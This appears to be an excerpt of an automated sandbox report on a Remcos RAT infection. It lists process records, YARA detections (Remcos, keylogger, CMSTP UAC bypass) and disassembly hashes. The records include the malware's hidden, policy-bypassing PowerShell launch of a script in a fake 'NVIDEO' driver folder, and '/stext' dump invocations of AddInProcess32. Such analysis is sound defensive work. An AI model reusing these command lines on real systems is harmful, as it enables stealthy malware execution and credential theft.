                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:25
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:26
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:27
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                                                                                                Imagebase:0x3f0000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:28
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:29
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                                                                                                Imagebase:0x880000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:30
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajvsujdnntiralmilkxwkxswwkf"
                                                                                                Imagebase:0xf20000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:31
                                                                                                Start time:00:17:32
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\lladutngjbaekramcnkpuknfxzxbri"
                                                                                                Imagebase:0xd70000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:32
                                                                                                Start time:00:17:34
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0xb40000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:33
                                                                                                Start time:00:17:40
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:34
                                                                                                Start time:00:17:40
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:35
                                                                                                Start time:00:17:41
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:36
                                                                                                Start time:00:17:41
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:37
                                                                                                Start time:00:17:43
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0x550000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:38
                                                                                                Start time:00:17:49
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:39
                                                                                                Start time:00:17:49
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:40
                                                                                                Start time:00:17:49
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:41
                                                                                                Start time:00:17:49
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:42
                                                                                                Start time:00:17:51
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0x5c0000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B885A75 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.3264875022.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8c3713945045861c39993ebfc2ce92ae6a73fdfee2c6f4589f604d25eeee3780
                                                                                                  • Instruction ID: 0bb942d7cb07b141f8276923b10770bce71efa10f3edb8aa6e679580706b9d60
                                                                                                  • Opcode Fuzzy Hash: 8c3713945045861c39993ebfc2ce92ae6a73fdfee2c6f4589f604d25eeee3780
                                                                                                  • Instruction Fuzzy Hash: 8701A73020CB0C4FD748EF0CE491AA5B7E0FB89360F10056EE58AC36A1D632E881CB41

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B887895 Relevance: .3, Instructions: 332COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6e3d16985bfc934b75416af2552845ac2acd4e161c94823093a60afbbc8caec3
                                                                                                  • Instruction ID: 7574fa5f966f835bd3971754800aabe5a3e2a0e1d9a24311c80a30f838b5b985
                                                                                                  • Opcode Fuzzy Hash: 6e3d16985bfc934b75416af2552845ac2acd4e161c94823093a60afbbc8caec3
                                                                                                  • Instruction Fuzzy Hash: 13A12931B1DE8D4FE35AEB6488216B577A2EF5A310F0141FAC01EC72E3DD38A9468741
                                                                                                  Function 00007FFD9B953DA9 Relevance: .3, Instructions: 279COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3061137897.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b950000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e5492024b960eb74b2bf6f172c03f5a19b34fe46a93b2c72b4254664fb030a81
                                                                                                  • Instruction ID: 15e336d8d6ca5dc4153005e9273088daa3c8cf9122a389862380755bb7ceb574
                                                                                                  • Opcode Fuzzy Hash: e5492024b960eb74b2bf6f172c03f5a19b34fe46a93b2c72b4254664fb030a81
                                                                                                  • Instruction Fuzzy Hash: 29816B32B2EA4D1FE7B9DBAC58661783BD1EF85210B0901BFD84EC71A3D914AC068381
                                                                                                  Function 00007FFD9B952B9E Relevance: .2, Instructions: 225COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3061137897.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b950000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3a540d11ca6866bbaa19dd7ac51dda48d14f9901b721cd7b8604811439cc844d
                                                                                                  • Instruction ID: 7e778b0f1e9eae6ebee3100866a4deb5a8fd2cd7bdabb95ecf112f9b521032ef
                                                                                                  • Opcode Fuzzy Hash: 3a540d11ca6866bbaa19dd7ac51dda48d14f9901b721cd7b8604811439cc844d
                                                                                                  • Instruction Fuzzy Hash: D9613822B2FA8E1FF7B996E854712B877C1EF55210B1A00FED85EC71E3ED48A9058341
                                                                                                  Function 00007FFD9B95259E Relevance: .2, Instructions: 194COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3061137897.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b950000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2b598b72762458c5960a3058b011d5d86254a54715c5900450ad61eb6312bf2f
                                                                                                  • Instruction ID: 059a76d8cd22d0296918fc3ae5684eaf603ffd0780867dbd88d20e506891e2af
                                                                                                  • Opcode Fuzzy Hash: 2b598b72762458c5960a3058b011d5d86254a54715c5900450ad61eb6312bf2f
                                                                                                  • Instruction Fuzzy Hash: E9512522B2FA8A1FFBB996E814756B873C1EF54310B1900BBC85EC71E7ED08AD018341
                                                                                                  Function 00007FFD9B950F28 Relevance: .2, Instructions: 164COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3061137897.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b950000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 74422ea876b4ac436e4c970f99b58d42e7849c8d478a4bb19943577707ba5af9
                                                                                                  • Instruction ID: 98deb8298e93f6d854516cf1a896c128ca2bf5aea2161cff9412988754fe6ae8
                                                                                                  • Opcode Fuzzy Hash: 74422ea876b4ac436e4c970f99b58d42e7849c8d478a4bb19943577707ba5af9
                                                                                                  • Instruction Fuzzy Hash: DE41462172EB894FE7A9DBAC68659747BC1EF95700F2401FEE848C72D3ED54E8028342
                                                                                                  Function 00007FFD9B888354 Relevance: .2, Instructions: 164COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 01e0d1fb4ef7d5fd77b0f3a10dbd5f0ab69b50be031db4d2b782289ac482ef11
                                                                                                  • Instruction ID: 7f0d78691ce09d90c50cb08223d206005653a482b8f2b8d7c6a76a9e04aa437f
                                                                                                  • Opcode Fuzzy Hash: 01e0d1fb4ef7d5fd77b0f3a10dbd5f0ab69b50be031db4d2b782289ac482ef11
                                                                                                  • Instruction Fuzzy Hash: EE41B311B2DE8A0FE79EE728443567977E2EF99340B4500FAD42EC72E7DD28AD464302
                                                                                                  Function 00007FFD9B8879FD Relevance: .2, Instructions: 151COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e3e6425804a079f99da6bf192b78633366c8ee0685149dcd1673138a29c83e37
                                                                                                  • Instruction ID: 1f4a0d3fdc58b46da7f0b8ded709e8984770a575c3dc91bf9e8b1c3b8a182495
                                                                                                  • Opcode Fuzzy Hash: e3e6425804a079f99da6bf192b78633366c8ee0685149dcd1673138a29c83e37
                                                                                                  • Instruction Fuzzy Hash: 2D41B034F1DA8A8FE759DB68C42067877B2EF8A315F1541B9D06EC72E2CE3869418741
                                                                                                  Function 00007FFD9B952BEA Relevance: .1, Instructions: 143COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3061137897.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b950000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7b43d504f683a42849558e7242342d5a1a58907b971c6ba2872a1f534c120b26
                                                                                                  • Instruction ID: e0d0c005d24fec1fa90c2b3ae67e23c252e278e12ebfc62fb338a5f549e9f3b7
                                                                                                  • Opcode Fuzzy Hash: 7b43d504f683a42849558e7242342d5a1a58907b971c6ba2872a1f534c120b26
                                                                                                  • Instruction Fuzzy Hash: 83412462F2FA8F1BF7A996E844B127877C2EF94250B5A00FAD85EC31E3DD48A8054301
                                                                                                  Function 00007FFD9B9525EA Relevance: .1, Instructions: 114COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3061137897.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b950000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 13317e26c32217e4939039d714716f6121786802dc1e6f92db45ab1cd79f01bf
                                                                                                  • Instruction ID: e1241bd15fcd739dc3a3258cb331aa5e1dbfc4a5a145cd9e3d78910070210c8c
                                                                                                  • Opcode Fuzzy Hash: 13317e26c32217e4939039d714716f6121786802dc1e6f92db45ab1cd79f01bf
                                                                                                  • Instruction Fuzzy Hash: 9631E462B2FA8A1BFBA9A2E814B92B836C1EF54350B5900BBD85EC71E7DD495D015301
                                                                                                  Function 00007FFD9B887B40 Relevance: .1, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c38b4b99634e4ec9a999e6afa7803393c9561e2da437de49232a572a674f5e89
                                                                                                  • Instruction ID: ae43e86b8bd56403afd8041fc7e9e1a70c255f716b1e681652f752788fd1981f
                                                                                                  • Opcode Fuzzy Hash: c38b4b99634e4ec9a999e6afa7803393c9561e2da437de49232a572a674f5e89
                                                                                                  • Instruction Fuzzy Hash: C1318131A18A6D5FD749DB68C8A1A78B7F5FF89708F10006ED15AD36D2CE39A942C701
                                                                                                  Function 00007FFD9B8881F3 Relevance: .1, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8f3db7b7814fd9e21240b40fad607902cc4401c34b35219e4a6d806f36a94af9
                                                                                                  • Instruction ID: 8a8270f6b1b8798aa26025475b59f4d7e895d1bc775ca99e22bfd032568f486e
                                                                                                  • Opcode Fuzzy Hash: 8f3db7b7814fd9e21240b40fad607902cc4401c34b35219e4a6d806f36a94af9
                                                                                                  • Instruction Fuzzy Hash: BC21F130B19A098FE799EB788465A7C76E2EF59305F5140B9E01EC72E6DD35DC82C701
                                                                                                  Function 00007FFD9B88935F Relevance: .1, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: df2c50eb6a274761e7fbf4081768e549406ad327f6492f608ddf96228d65823f
                                                                                                  • Instruction ID: 484804a616f80a805c41386f4b00a39d9173bfea740ddbac17c44819cf62390c
                                                                                                  • Opcode Fuzzy Hash: df2c50eb6a274761e7fbf4081768e549406ad327f6492f608ddf96228d65823f
                                                                                                  • Instruction Fuzzy Hash: F3116D40B2CA564BE31E637C6836B79A6C3EF8D700F2541FAE02DC72D7DD286C428252
                                                                                                  Function 00007FFD9B887AE8 Relevance: .1, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3bc2bf27aa22a5042e4fe1e97dc36fe98e44b4b8092e89f3f0674b651ac1ab99
                                                                                                  • Instruction ID: 786745b9759ac2706d3a1886132055189cf8944f1da3b152101cefc835adb09b
                                                                                                  • Opcode Fuzzy Hash: 3bc2bf27aa22a5042e4fe1e97dc36fe98e44b4b8092e89f3f0674b651ac1ab99
                                                                                                  • Instruction Fuzzy Hash: 8221B034F1D9498BE329DB68C46067877B2EB89311F5541BDD02AC32E2CE346D81C741
                                                                                                  Function 00007FFD9B887CEA Relevance: .1, Instructions: 64COMMON
